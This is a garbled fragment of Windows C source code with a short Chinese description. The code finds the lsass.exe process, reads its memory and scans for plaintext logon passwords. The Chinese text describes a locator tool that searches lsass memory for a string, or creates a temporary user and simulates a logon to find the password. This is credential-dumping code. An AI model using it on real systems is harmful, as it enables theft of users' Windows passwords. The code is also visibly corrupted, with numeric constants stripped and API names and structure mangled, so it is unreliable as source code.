⑴if (Buffer == x && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == && Buffer[i + ] == )
⑵/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
⑶That Way
⑷j = i + ;
⑸for (; j < nSize; j += 2)
⑹if (Buffer[j] > )
⑺Password[Count++] = Buffer[j];
⑻return i + ; // One Flag To Indicate We Find The Password
⑼return -; // Well,We Fail To Find The Password,And This Always Happens
⑽// End Search
⑾//------------------------------------------------------------------------------------
⑿// Purpose: To Get The Lsass.exe PID
⒀// Return Type: DWORD
⒁// Parameters: None
⒂//------------------------------------------------------------------------------------
⒃DWORD GetLsassPID()
⒄HANDLE hProcessSnap;
⒅HANDLE hProcess = NULL;
⒆PROCESSENTRY pe;
⒇DWORD PID = ;
⒈hProcessSnap = CreateToolhelpSnapshot(THCS_SNAPPROCESS, );
⒉if( hProcessSnap == INVALID_HANDLE_VALUE )
⒊printf("Fail To Create Snap Shot
⒋return ;
⒌pe.dwSize = sizeof(PROCESSENTRY);
⒍if( !ProcessFirst(hProcessSnap, &pe))
⒎CloseHandle(hProcessSnap); // Must clean up the snapshot object!
⒏return ;
⒐if (strcmpi(pe.szExeFile,"Lsass.EXE") == )
⒑PID = pe.thProcessID;
⒒}while(ProcessNext( hProcessSnap, &pe));
⒓CloseHandle( hProcessSnap);
⒔return PID;
⒕// End GetLsassPID()
⒖//------------------------------------------------------------------------------------
⒗// Purpose: To Find The Password
⒘// Return Type: BOOLEAN
⒙// Parameters:
⒚// In: DWORD PID -> The Lsass.exe's PID
⒛//------------------------------------------------------------------------------------
①BOOL FindPassword(DWORD PID)
②HANDLE hProcess = NULL;
③char Buffer[ * ] = ;
④DWORD ByteGet = ;
⑤int Found = -;
⑥hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
⑦if (hProcess == NULL)
⑧printf("Fail To Open Process
⑨return FALSE;
⑩if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer, * ,&ByteGet)) // Read The Memory From Lsass.exe
Ⅰprintf("Fail To Read Memory
ⅡCloseHandle(hProcess);
Ⅲreturn FALSE;
ⅣCloseHandle(hProcess);
ⅤFound = Search(Buffer,ByteGet); // Search The Password
Ⅵif (Found >= ) // We May Find The Password
Ⅶif (strlen(Password) > ) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
Ⅷprintf("Found Password At #x%x -> "%s"
Ⅸ",Found + BaseAddress,Password);
Ⅹprintf("Fail To Find The Password
㈠return TRUE;
㈡// End FindPassword
㈢//------------------------------------------------------------------------------------
㈣// Purpose: Check If The Box Is windows
㈤// Return Type: BOOLEAN
㈥// Parameters: None
㈦//------------------------------------------------------------------------------------
㈧BOOL Is()
㈨OSVERSIONINFOEX osvi;
㈩BOOL bsVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(bsVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
return (osvi.dwMajorVersion == && osvi.dwMinorVersion == );
// End Is()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。